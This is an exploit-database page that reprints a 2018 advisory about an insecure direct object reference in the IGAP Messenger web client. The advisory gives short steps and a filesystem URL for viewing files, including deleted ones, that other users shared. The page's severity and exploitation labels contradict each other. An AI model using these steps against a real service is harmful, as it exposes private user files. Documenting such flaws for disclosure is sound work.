Advertisement






IGAP Messenger Web Version Insecure Direct Object References Vulnerability

CVE Category Price Severity
CVE-2021-3530 CWE-639 Not specified High
Author Risk Exploitation Type Date
Unknown High Remote 2018-01-19
CPE
cpe:cpe:/a:igap:messenger:web-version
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018010182

Below is a copy:

IGAP Messenger Web Version Insecure Direct Object References Vulnerability
[+] Exploit Title ; IGAP Messenger Web Version Insecure Direct Object References Vulnerability

[+] Date : 2018-01-19

[+] Author : 0P3N3R From IRANIAN ETHICAL HACKERS

[+] Vendor Homepage : https://web.igap.net/

[+] Version : 3.2.0

[+] Dork : N/A

[+] Forum : irethicalhackers.com/forums

[+] Tested On : windows 10 - kali linux 2.0

[+] Contact : https://telegram.me/WebServer

[+] Description :

[!] IGAP is An extremely powerful and popular instant messenger

[!] IGAP Has three versions of the desktop - Web and mobile.

[!] More than 100,000 users use it in Iran You can Download it from App Store 

[+] Support Site :

[!] https://www.igap.net

[+] Poc : 

[!] With this vulnerability, you can see files on the server

[!] You can see files uploaded to groups or personal

[!] Even if these files have been deleted And You can Recover your Files !

[!] But you should know that these files are items that have been shared by different people

[+] Access To Vulnerability

[!] First login to your account

[!] And Go This Link : filesystem:https://web.igap.net/temporary/

[!] Of course, you can right-click the file and click on the "Copy Image Address" and see the file


[+] Security Level :

[!] Low

[+] Exploitation Technique:

[!] Local



[+] Vulnerability Link :

[*] filesystem:https://web.igap.net/temporary/

[+] ScreenShot :

[!] http://s6.uplod.ir/i/00912/br0rj3z9ntwm.png


[+] We Are : Mehrdad_ice [+] 0P3N3R [+] BaxTurk24 [+] S0hp

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.